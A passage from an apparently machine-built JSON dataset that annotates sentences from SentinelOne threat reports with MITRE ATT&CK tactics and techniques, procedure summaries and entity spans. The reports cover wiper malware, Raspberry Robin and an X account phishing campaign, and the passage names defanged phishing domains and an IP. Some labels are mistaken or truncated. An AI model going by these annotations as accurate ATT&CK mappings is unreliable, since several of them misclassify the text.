"tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1485", "name": "Data Destruction" } ], "procedure": "increased use of wiper malware", "entities": [ { "text": "wiper malware.", "start": 114, "end": 128, "label": "MalwareTool" }, { "text": "use", "start": 107, "end": 110, "label": "Action" } ] }, { "uid": "sentinel-65_SentinelOne_report-p1-s28-fc227f", "source": "sentinel", "doc_id": "65_SentinelOne_report", "page_number": 1, "sentence_id": 28, "context_before": "The Russian invasion of Ukraine created major shifts in the 2022 threat landscape, including the increased use of wiper malware.", "sentence_text": "Widely impacting Ukrainian citizens as well as organizations based outside of Ukraine was the Royal Road Document Builder.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-65_SentinelOne_report-p1-s29-df1ef6", "source": "sentinel", "doc_id": "65_SentinelOne_report", "page_number": 1, "sentence_id": 29, "context_before": "Widely impacting Ukrainian citizens as well as organizations based outside of Ukraine was the Royal Road Document Builder.", "sentence_text": "SentinelLabs’ analysis\nindicates that the threat actors behind these cyberattacks are part of a Chinese state-sponsored cyber espionage group which uses phishing emails to deliver these malicious documents and exploit the Bisonal backdoor.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.001", "name": "Spearphishing Attachment" }, { "id": "T1204", "name": "User Execution" } ], "procedure": "uses phishing emails to deliver malicious documents and exploit the Bisonal backdoor", "entities": [ { "text": "Chinese state-sponsored cyber espionage group", "start": 96, "end": 141, "label": "ThreatActor" }, { "text": "Bisonal backdoor.", "start": 222, "end": 239, "label": "MalwareTool" }, { "text": "uses phishing emails to deliver these malicious documents and exploit the Bisonal backdoor.", "start": 148, "end": 239, "label": "Action" } ] }, { "uid": "sentinel-65_SentinelOne_report-p1-s30-7323fc", "source": "sentinel", "doc_id": "65_SentinelOne_report", "page_number": 1, "sentence_id": 30, "context_before": "SentinelLabs’ analysis\nindicates that the threat actors behind these cyberattacks are part of a Chinese state-sponsored cyber espionage group which uses phishing emails to deliver these malicious documents and exploit the Bisonal backdoor.", "sentence_text": "Raspberry Robin Worms Its Way Through 2022 Last year, threat actors accelerated their use of Raspberry Robin to deliver multiple types of malware and ransomware to infected endpoints.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "accelerated their use of Raspberry Robin to deliver multiple types of malware and ransomware to infected endpoints", "entities": [ { "text": "threat actors ", "start": 54, "end": 68, "label": "ThreatActor" }, { "text": "Raspberry Robin", "start": 93, "end": 108, "label": "MalwareTool" }, { "text": "malware and ransomware", "start": 138, "end": 160, "label": "MalwareTool" }, { "text": "accelerated their use of Raspberry Robin to deliver multiple types of malware and ransomware to infected endpoints", "start": 68, "end": 182, "label": "Action" } ] }, { "uid": "sentinel-65_SentinelOne_report-p1-s31-fbf85d", "source": "sentinel", "doc_id": "65_SentinelOne_report", "page_number": 1, "sentence_id": 31, "context_before": "Raspberry Robin Worms Its Way Through 2022 Last year, threat actors accelerated their use of Raspberry Robin to deliver multiple types of malware and ransomware to infected endpoints.", "sentence_text": "Also known as the QNAP or LNK worm, Raspberry Robin is a self-propagating worm used in attacks as a delivery mechanism for second stage malware.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1204", "name": "User Execution" }, { "id": "T1566", "name": "Phishing" }, { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "used in attacks as a delivery mechanism for second stage malware", "entities": [ { "text": "Raspberry Robin", "start": 36, "end": 51, "label": "MalwareTool" }, { "text": "QNAP or LNK worm", "start": 18, "end": 34, "label": "MalwareTool" }, { "text": " used in attacks as a delivery mechanism for second stage malware.", "start": 78, "end": 144, "label": "Action" }, { "text": " self-propagating worm", "start": 56, "end": 78, "label": "Action" } ] }, { "uid": "sentinel-65_SentinelOne_report-p1-s32-bdddf5", "source": "sentinel", "doc_id": "65_SentinelOne_report", "page_number": 1, "sentence_id": 32, "context_before": "Also known as the QNAP or LNK worm, Raspberry Robin is a self-propagating worm used in attacks as a delivery mechanism for second stage malware.", "sentence_text": "Its usage amongst threat actors spiked in the latter half of 2022 making it the fastest growing threat families of last year.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-65_SentinelOne_report-p1-s33-0903cf", "source": "sentinel", "doc_id": "65_SentinelOne_report", "page_number": 1, "sentence_id": 33, "context_before": "Its usage amongst threat actors spiked in the latter half of 2022 making it the fastest growing threat families of last year.", "sentence_text": "Across 2022, SocGholish averaged 18 malware-staging servers being unveiled each month.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-65_SentinelOne_report-p1-s34-a1a5ca", "source": "sentinel", "doc_id": "65_SentinelOne_report", "page_number": 1, "sentence_id": 34, "context_before": "Across 2022, SocGholish averaged 18 malware-staging servers being unveiled each month.", "sentence_text": "Threat groups use a JavaScript-based framework to gain initial access to targeted systems in campaigns that primarily revolve around social engineering tactics.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "gain initial access using JavaScript-based framework", "entities": [ { "text": "Threat groups", "start": 0, "end": 13, "label": "ThreatActor" }, { "text": "JavaScript-based framework ", "start": 20, "end": 47, "label": "MalwareTool" }, { "text": "gain initial access to targeted systems", "start": 50, "end": 89, "label": "Action" } ] }, { "uid": "sentinel-65_SentinelOne_report-p1-s35-4200db", "source": "sentinel", "doc_id": "65_SentinelOne_report", "page_number": 1, "sentence_id": 35, "context_before": "Threat groups use a JavaScript-based framework to gain initial access to targeted systems in campaigns that primarily revolve around social engineering tactics.", "sentence_text": "This tactic allows cyber criminals to sidestep first-generation EDR solutions and legacy antivirus products while installing malware on targeted devices.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1562", "name": "Impair Defenses" }, { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "bypass EDR/antivirus and install malware", "entities": [ { "text": "cyber criminals", "start": 19, "end": 34, "label": "ThreatActor" }, { "text": "malware", "start": 125, "end": 132, "label": "MalwareTool" }, { "text": "sidestep first-generation EDR solutions and legacy antivirus products", "start": 38, "end": 107, "label": "Action" }, { "text": "installing malware on targeted devices.", "start": 114, "end": 153, "label": "Action" } ] }, { "uid": "sentinel-65_SentinelOne_report-p1-s36-da1dc1", "source": "sentinel", "doc_id": "65_SentinelOne_report", "page_number": 1, "sentence_id": 36, "context_before": "This tactic allows cyber criminals to sidestep first-generation EDR solutions and legacy antivirus products while installing malware on targeted devices.", "sentence_text": "WatchTower | 2022 in Review Lessons Learned from Our Threat Hunters & DFIR Investigators Read the Full Report Conclusion 2022 showed that threat actors continue to use what works while investing in novel techniques in response to countermeasures by security teams and security software.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "use existing techniques and develop novel techniques in response to defenses", "entities": [ { "text": "threat actors", "start": 138, "end": 151, "label": "ThreatActor" }, { "text": "use what works", "start": 164, "end": 178, "label": "Action" }, { "text": "investing in novel techniques", "start": 185, "end": 214, "label": "Action" } ] }, { "uid": "sentinel-65_SentinelOne_report-p1-s37-1e5591", "source": "sentinel", "doc_id": "65_SentinelOne_report", "page_number": 1, "sentence_id": 37, "context_before": "WatchTower | 2022 in Review Lessons Learned from Our Threat Hunters & DFIR Investigators Read the Full Report Conclusion 2022 showed that threat actors continue to use what works while investing in novel techniques in response to countermeasures by security teams and security software.", "sentence_text": "Though new threats will undoubtedly continue to emerge, there are many ways enterprises can mitigate risk and harden their defenses.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-65_SentinelOne_report-p1-s38-f1e67d", "source": "sentinel", "doc_id": "65_SentinelOne_report", "page_number": 1, "sentence_id": 38, "context_before": "Though new threats will undoubtedly continue to emerge, there are many ways enterprises can mitigate risk and harden their defenses.", "sentence_text": "Establishing an effective response strategy and deep, continuous monitoring can help augment a business’ in-house team’s defenses with robust detection and response capabilities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-65_SentinelOne_report-p1-s40-427ea0", "source": "sentinel", "doc_id": "65_SentinelOne_report", "page_number": 1, "sentence_id": 40, "context_before": "Webinar:", "sentence_text": "WatchTower | 2022 in Review Get key takeaways from SentinelOne's threat hunts and investigations in 2022 and tips for protecting your organization in 2023.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-65_SentinelOne_report-p1-s41-03f5fb", "source": "sentinel", "doc_id": "65_SentinelOne_report", "page_number": 1, "sentence_id": 41, "context_before": "WatchTower | 2022 in Review Get key takeaways from SentinelOne's threat hunts and investigations in 2022 and tips for protecting your organization in 2023.", "sentence_text": "Watch Now\nLike this article?", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-65_SentinelOne_report-p1-s42-35615c", "source": "sentinel", "doc_id": "65_SentinelOne_report", "page_number": 1, "sentence_id": 42, "context_before": "Watch Now\nLike this article?", "sentence_text": "Get Demo\nSentinelLabs\nSentinelLabs: Threat Intel & Malware Analysis", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-65_SentinelOne_report-p1-s43-943c80", "source": "sentinel", "doc_id": "65_SentinelOne_report", "page_number": 1, "sentence_id": 43, "context_before": "Get Demo\nSentinelLabs\nSentinelLabs: Threat Intel & Malware Analysis", "sentence_text": "We are hunters, reversers, exploit developers, & tinkerers shedding light on the vast world of malware, exploits, APTs, & cybercrime across all platforms.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-65_SentinelOne_report-p1-s44-f5e45f", "source": "sentinel", "doc_id": "65_SentinelOne_report", "page_number": 1, "sentence_id": 44, "context_before": "We are hunters, reversers, exploit developers, & tinkerers shedding light on the vast world of malware, exploits, APTs, & cybercrime across all platforms.", "sentence_text": "VISIT SITE", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-66_SentinelOne_report-p1-s1-3f266b", "source": "sentinel", "doc_id": "66_SentinelOne_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "X Phishing | Campaign Targeting High Profile Accounts Returns, Promoting Crypto Scams | SentinelOne Security Research X Phishing | Campaign Targeting High Profile Accounts Returns, Promoting Crypto Scams Tom Hegel , Jim Walter & Alex Delamotte / January 31, 2025 Executive Summary", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Phishing campaign targeting high-profile accounts, promoting crypto scams", "entities": [ { "text": "X Phishing", "start": 0, "end": 10, "label": "ThreatActor" }, { "text": "Campaign Targeting High Profile Accounts", "start": 13, "end": 53, "label": "Action" }, { "text": "Promoting Crypto Scams", "start": 63, "end": 85, "label": "Action" } ] }, { "uid": "sentinel-66_SentinelOne_report-p1-s2-846650", "source": "sentinel", "doc_id": "66_SentinelOne_report", "page_number": 1, "sentence_id": 2, "context_before": "X Phishing | Campaign Targeting High Profile Accounts Returns, Promoting Crypto Scams | SentinelOne Security Research X Phishing | Campaign Targeting High Profile Accounts Returns, Promoting Crypto Scams Tom Hegel , Jim Walter & Alex Delamotte / January 31, 2025 Executive Summary", "sentence_text": "An active phishing campaign is targeting high-profile X accounts in an attempt to hijack and exploit them for fraudulent activity.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Phishing campaign targeting high-profile accounts to hijack and exploit for fraud", "entities": [ { "text": "targeting high-profile X accounts", "start": 31, "end": 64, "label": "Action" }, { "text": "hijack and exploit them for fraudulent activity.", "start": 82, "end": 130, "label": "Action" } ] }, { "uid": "sentinel-66_SentinelOne_report-p1-s3-4db465", "source": "sentinel", "doc_id": "66_SentinelOne_report", "page_number": 1, "sentence_id": 3, "context_before": "An active phishing campaign is targeting high-profile X accounts in an attempt to hijack and exploit them for fraudulent activity.", "sentence_text": "SentinelLABS’ analysis links this activity to a similar operation from last year that successfully compromised multiple accounts to spread scam content with financial objectives.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1566", "name": "Phishing" }, { "id": "T1586", "name": "Compromise Accounts" } ], "procedure": "Compromise multiple accounts and spread scam content for financial gain", "entities": [ { "text": "compromised multiple accounts", "start": 99, "end": 128, "label": "Action" }, { "text": "spread scam content with financial objectives.", "start": 132, "end": 178, "label": "Action" } ] }, { "uid": "sentinel-66_SentinelOne_report-p1-s4-27fea7", "source": "sentinel", "doc_id": "66_SentinelOne_report", "page_number": 1, "sentence_id": 4, "context_before": "SentinelLABS’ analysis links this activity to a similar operation from last year that successfully compromised multiple accounts to spread scam content with financial objectives.", "sentence_text": "If you’ve encountered similar suspicious activity, SentinelLABS would love to hear from you — please reach out to the team at [email protected]\nAccount Compromise Process Thanks to tips from targets and collaboration with industry partners, SentinelLABS has observed a variety of phishing lures tied to this campaign over the past few weeks.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Use phishing lures to compromise accounts", "entities": [ { "text": "phishing lures", "start": 280, "end": 294, "label": "Infrastructure_Indicator" }, { "text": " phishing lures", "start": 279, "end": 294, "label": "Action" } ] }, { "uid": "sentinel-66_SentinelOne_report-p1-s5-52a929", "source": "sentinel", "doc_id": "66_SentinelOne_report", "page_number": 1, "sentence_id": 5, "context_before": "If you’ve encountered similar suspicious activity, SentinelLABS would love to hear from you — please reach out to the team at [email protected]\nAccount Compromise Process Thanks to tips from targets and collaboration with industry partners, SentinelLABS has observed a variety of phishing lures tied to this campaign over the past few weeks.", "sentence_text": "One example is the classic account login notice.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-66_SentinelOne_report-p1-s6-a5feba", "source": "sentinel", "doc_id": "66_SentinelOne_report", "page_number": 1, "sentence_id": 6, "context_before": "One example is the classic account login notice.", "sentence_text": "The links in the email received by the target are not legitimate and lead to credential phishing sites.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Email links direct targets to credential phishing sites.", "entities": [ { "text": "email", "start": 17, "end": 22, "label": "Infrastructure_Indicator" }, { "text": "lead to credential phishing sites", "start": 69, "end": 102, "label": "Action" } ] }, { "uid": "sentinel-66_SentinelOne_report-p1-s7-4dad18", "source": "sentinel", "doc_id": "66_SentinelOne_report", "page_number": 1, "sentence_id": 7, "context_before": "The links in the email received by the target are not legitimate and lead to credential phishing sites.", "sentence_text": "Other observed lures use copyright violation themes.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "use copyright violation themes", "entities": [ { "text": " use copyright violation themes", "start": 20, "end": 51, "label": "Action" } ] }, { "uid": "sentinel-66_SentinelOne_report-p1-s8-3333c7", "source": "sentinel", "doc_id": "66_SentinelOne_report", "page_number": 1, "sentence_id": 8, "context_before": "Other observed lures use copyright violation themes.", "sentence_text": "However, SentinelLABS notes that directly phishing users may not be the only access method employed by this attacker.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "phishing users", "entities": [ { "text": "this attacker", "start": 103, "end": 116, "label": "ThreatActor" }, { "text": " phishing users", "start": 41, "end": 56, "label": "Action" } ] }, { "uid": "sentinel-66_SentinelOne_report-p1-s9-172f44", "source": "sentinel", "doc_id": "66_SentinelOne_report", "page_number": 1, "sentence_id": 9, "context_before": "However, SentinelLABS notes that directly phishing users may not be the only access method employed by this attacker.", "sentence_text": "In recent cases, we observed the actor abusing Google’s “AMP Cache” domain cdn.ampproject[.]org to evade email detections and redirect the user to a phishing domain:\nThis ultimately leads the targets to an actor-made phishing website seeking X account credentials:\nIn the copyright infringement lure scenario, the user will first visit an Action Needed page before being prompted to enter credentials:\nOnce an account is taken over, the attacker swiftly locks out the legitimate owner and begins posting fraudulent cryptocurrency opportunities or links to external sites designed to lure additional targets, often with a crypto theft-related theme.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0006", "name": "Credential Access" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1566", "name": "Phishing" }, { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "Abuses AMP Cache redirection to evade detection, deliver phishing pages, harvest credentials, and take over accounts for fraudulent activity.", "entities": [ { "text": "the actor", "start": 29, "end": 38, "label": "ThreatActor" }, { "text": "Google’s “AMP Cache” domain cdn.ampproject[.]org", "start": 47, "end": 95, "label": "Infrastructure_Indicator" }, { "text": "actor-made phishing website", "start": 206, "end": 233, "label": "Infrastructure_Indicator" }, { "text": "abusing Google’s “AMP Cache” domain cdn.ampproject[.]org to evade email detections", "start": 39, "end": 121, "label": "Action" }, { "text": "redirect the user to a phishing domain", "start": 126, "end": 164, "label": "Action" }, { "text": "seeking X account credentials", "start": 234, "end": 263, "label": "Action" }, { "text": "enter credentials", "start": 383, "end": 400, "label": "Action" }, { "text": "account is taken over", "start": 410, "end": 431, "label": "Action" }, { "text": "locks out the legitimate owner and begins posting fraudulent cryptocurrency opportunities or links to external sites designed to lure additional targets", "start": 454, "end": 606, "label": "Action" } ] }, { "uid": "sentinel-66_SentinelOne_report-p1-s10-f0962a", "source": "sentinel", "doc_id": "66_SentinelOne_report", "page_number": 1, "sentence_id": 10, "context_before": "In recent cases, we observed the actor abusing Google’s “AMP Cache” domain cdn.ampproject[.]org to evade email detections and redirect the user to a phishing domain:\nThis ultimately leads the targets to an actor-made phishing website seeking X account credentials:\nIn the copyright infringement lure scenario, the user will first visit an Action Needed page before being prompted to enter credentials:\nOnce an account is taken over, the attacker swiftly locks out the legitimate owner and begins posting fraudulent cryptocurrency opportunities or links to external sites designed to lure additional targets, often with a crypto theft-related theme.", "sentence_text": "Widespread Activity\nIn recent activity associated with this campaign, the domain securelogins-x[.]com has been used to deliver emails and x-recoverysupport[.]com to host phishing pages.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1566.002", "name": "Spearphishing Link" } ], "procedure": "using domains to send phishing emails and host phishing pages for account compromise", "entities": [ { "text": "securelogins-x[.]com", "start": 81, "end": 101, "label": "Infrastructure_Indicator" }, { "text": "x-recoverysupport[.]com", "start": 138, "end": 161, "label": "Infrastructure_Indicator" }, { "text": " deliver emails", "start": 118, "end": 133, "label": "Action" }, { "text": "host phishing pages.", "start": 165, "end": 185, "label": "Action" } ] }, { "uid": "sentinel-66_SentinelOne_report-p1-s11-f97890", "source": "sentinel", "doc_id": "66_SentinelOne_report", "page_number": 1, "sentence_id": 11, "context_before": "Widespread Activity\nIn recent activity associated with this campaign, the domain securelogins-x[.]com has been used to deliver emails and x-recoverysupport[.]com to host phishing pages.", "sentence_text": "Our observations indicate a level of informality and flexibility of infrastructure use – meaning any of these domains can be considered email delivery or phishing page hosting.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-66_SentinelOne_report-p1-s12-8941c3", "source": "sentinel", "doc_id": "66_SentinelOne_report", "page_number": 1, "sentence_id": 12, "context_before": "Our observations indicate a level of informality and flexibility of infrastructure use – meaning any of these domains can be considered email delivery or phishing page hosting.", "sentence_text": "An overall collection of recent activity can be observed hosted on 84.38.130[.]20 , an IP associated with a Belize-based VPS service called Dataclub.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1583.001", "name": "Domains" } ], "procedure": "host phishing or malicious activity on attacker-controlled infrastructure", "entities": [ { "text": " 84.38.130[.]20", "start": 66, "end": 81, "label": "Infrastructure_Indicator" }, { "text": "can be observed hosted on 84.38.130[.]20", "start": 41, "end": 81, "label": "Action" } ] }, { "uid": "sentinel-66_SentinelOne_report-p1-s13-ee49f8", "source": "sentinel", "doc_id": "66_SentinelOne_report", "page_number": 1, "sentence_id": 13, "context_before": "An overall collection of recent activity can be observed hosted on 84.38.130[.]20 , an IP associated with a Belize-based VPS service called Dataclub.", "sentence_text": "The domains themselves have been predominantly registered through Turkish hosting provider Turkticaret.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583.001", "name": "Domains" } ], "procedure": "register domains for phishing or malicious activity", "entities": [ { "text": "domains", "start": 4, "end": 11, "label": "Infrastructure_Indicator" }, { "text": "have been predominantly registered through ", "start": 23, "end": 66, "label": "Action" } ] }, { "uid": "sentinel-66_SentinelOne_report-p1-s14-75957b", "source": "sentinel", "doc_id": "66_SentinelOne_report", "page_number": 1, "sentence_id": 14, "context_before": "The domains themselves have been predominantly registered through Turkish hosting provider Turkticaret.", "sentence_text": "As shown below, the cluster of activity began in mid-2024 and continues today.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-66_SentinelOne_report-p1-s15-93f14f", "source": "sentinel", "doc_id": "66_SentinelOne_report", "page_number": 1, "sentence_id": 15, "context_before": "As shown below, the cluster of activity began in mid-2024 and continues today.", "sentence_text": "While this is only one phishing page hosting IP, it provides a good perspective of the length of this activity and its ability to avoid much attention for over a year.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1562", "name": "Impair Defenses" } ], "procedure": "phishing page hosting and evasion", "entities": [ { "text": "one phishing page hosting IP", "start": 19, "end": 47, "label": "Infrastructure_Indicator" }, { "text": "avoid much attention for over a year", "start": 130, "end": 166, "label": "Action" } ] }, { "uid": "sentinel-66_SentinelOne_report-p1-s16-bd9f57", "source": "sentinel", "doc_id": "66_SentinelOne_report", "page_number": 1, "sentence_id": 16, "context_before": "While this is only one phishing page hosting IP, it provides a good perspective of the length of this activity and its ability to avoid much attention for over a year.", "sentence_text": "Our observations suggest that the attacker is highly adaptable, continuously exploring new techniques while maintaining a clear financial motive.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "adapting and experimenting with techniques for financial gain", "entities": [ { "text": " the attacke", "start": 29, "end": 41, "label": "ThreatActor" }, { "text": "continuously exploring new techniques", "start": 64, "end": 101, "label": "Action" } ] }, { "uid": "sentinel-66_SentinelOne_report-p1-s17-6c9c4e", "source": "sentinel", "doc_id": "66_SentinelOne_report", "page_number": 1, "sentence_id": 17, "context_before": "Our observations suggest that the attacker is highly adaptable, continuously exploring new techniques while maintaining a clear financial motive.", "sentence_text": "The targeting appears constrained, yet opportunistic.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-66_SentinelOne_report-p1-s18-b38ee8", "source": "sentinel", "doc_id": "66_SentinelOne_report", "page_number": 1, "sentence_id": 18, "context_before": "The targeting appears constrained, yet opportunistic.", "sentence_text": "Notably, past public reports have attributed related activity to Turkish-speaking actors based on language phishing page source comment language.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "created phishing pages with Turkish-language source comments", "entities": [ { "text": "Turkish-speaking actors", "start": 65, "end": 88, "label": "ThreatActor" }, { "text": "attributed related activity to Turkish-speaking actors based on language phishing page", "start": 34, "end": 120, "label": "Action" } ] }, { "uid": "sentinel-66_SentinelOne_report-p1-s19-848356", "source": "sentinel", "doc_id": "66_SentinelOne_report", "page_number": 1, "sentence_id": 19, "context_before": "Notably, past public reports have attributed related activity to Turkish-speaking actors based on language phishing page source comment language.", "sentence_text": "At this time, we do not attribute this campaign to a specific country or any widely-tracked threat actor.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-66_SentinelOne_report-p1-s20-0de80b", "source": "sentinel", "doc_id": "66_SentinelOne_report", "page_number": 1, "sentence_id": 20, "context_before": "At this time, we do not attribute this campaign to a specific country or any widely-tracked threat actor.", "sentence_text": "FASTPANEL is a website hosting and building service that specializes in rapid building and management of websites.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-66_SentinelOne_report-p1-s21-0c91db", "source": "sentinel", "doc_id": "66_SentinelOne_report", "page_number": 1, "sentence_id": 21, "context_before": "FASTPANEL is a website hosting and building service that specializes in rapid building and management of websites.", "sentence_text": "FASTPANEL is routinely utilized by drainer gains and phishing campaigns, and is also included in associated guides and tutorials distributed throughout cybercrime communication channels.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "FASTPANEL is used in phishing campaigns.", "entities": [ { "text": "FASTPANEL", "start": 0, "end": 9, "label": "Infrastructure_Indicator" }, { "text": "utilized by drainer gains and phishing campaigns", "start": 23, "end": 71, "label": "Action" } ] }, { "uid": "sentinel-66_SentinelOne_report-p1-s22-cc2f5f", "source": "sentinel", "doc_id": "66_SentinelOne_report", "page_number": 1, "sentence_id": 22, "context_before": "FASTPANEL is routinely utilized by drainer gains and phishing campaigns, and is also included in associated guides and tutorials distributed throughout cybercrime communication channels.", "sentence_text": "Publicly Linkable Activity Emerging Account Intrusions", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-66_SentinelOne_report-p1-s23-88e4c2", "source": "sentinel", "doc_id": "66_SentinelOne_report", "page_number": 1, "sentence_id": 23, "context_before": "Publicly Linkable Activity Emerging Account Intrusions", "sentence_text": "While we have not yet established a high-confidence link, a recent compromise of a Tor Project account closely mirrors our observations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-66_SentinelOne_report-p1-s24-57379e", "source": "sentinel", "doc_id": "66_SentinelOne_report", "page_number": 1, "sentence_id": 24, "context_before": "While we have not yet established a high-confidence link, a recent compromise of a Tor Project account closely mirrors our observations.", "sentence_text": "While it is possible that the same threat actor is responsible, we lack sufficient evidence to confirm the connection as of this writing.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-66_SentinelOne_report-p1-s25-e6c741", "source": "sentinel", "doc_id": "66_SentinelOne_report", "page_number": 1, "sentence_id": 25, "context_before": "While it is possible that the same threat actor is responsible, we lack sufficient evidence to confirm the connection as of this writing.", "sentence_text": "The Decentralized Autonomous Wireless Network (DAWN) was another victim of this type of attack.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-66_SentinelOne_report-p1-s26-f9890e", "source": "sentinel", "doc_id": "66_SentinelOne_report", "page_number": 1, "sentence_id": 26, "context_before": "The Decentralized Autonomous Wireless Network (DAWN) was another victim of this type of attack.", "sentence_text": "The threat actor leveraged the compromised DAWN-related social media accounts to lure victims into entering credentials into phishing pages targeting X and Telegram credentials.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1566.002", "name": "Spearphishing Link" } ], "procedure": "Leverage compromised DAWN-related social media accounts to lure victims into entering credentials into phishing pages targeting X and Telegram.", "entities": [ { "text": "The threat actor", "start": 0, "end": 16, "label": "ThreatActor" }, { "text": "leveraged the compromised DAWN-related social media accounts to lure victims into entering credentials into phishing pages targeting X and Telegram credentials", "start": 17, "end": 176, "label": "Action" }, { "text": "DAWN-related social media accounts", "start": 43, "end": 77, "label": "Infrastructure_Indicator" }, { "text": "phishing pages", "start": 125, "end": 139, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-66_SentinelOne_report-p1-s27-c9921d", "source": "sentinel", "doc_id": "66_SentinelOne_report", "page_number": 1, "sentence_id": 27, "context_before": "The threat actor leveraged the compromised DAWN-related social media accounts to lure victims into entering credentials into phishing pages targeting X and Telegram credentials.", "sentence_text": "The compromise of DAWN’s X accounts goes back to mid-January 2025.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "DAWN’s X accounts were compromised, indicating account takeover activity.", "entities": [ { "text": "The compromise of DAWN’s X accounts", "start": 0, "end": 35, "label": "Action" }, { "text": "DAWN’s X accounts", "start": 18, "end": 35, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-66_SentinelOne_report-p1-s28-5ab54a", "source": "sentinel", "doc_id": "66_SentinelOne_report", "page_number": 1, "sentence_id": 28, "context_before": "The compromise of DAWN’s X accounts goes back to mid-January 2025.", "sentence_text": "In one example, buy-tanai[.]com was pitched as such: “ $TANA AI.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.001", "name": "Spearphishing Attachment" } ], "procedure": "pitched buy-tanai[.]com as a lure", "entities": [ { "text": " buy-tanai[.]com", "start": 15, "end": 31, "label": "Infrastructure_Indicator" }, { "text": "pitched", "start": 36, "end": 43, "label": "Action" } ] }, { "uid": "sentinel-66_SentinelOne_report-p1-s29-8770cf", "source": "sentinel", "doc_id": "66_SentinelOne_report", "page_number": 1, "sentence_id": 29, "context_before": "In one example, buy-tanai[.]com 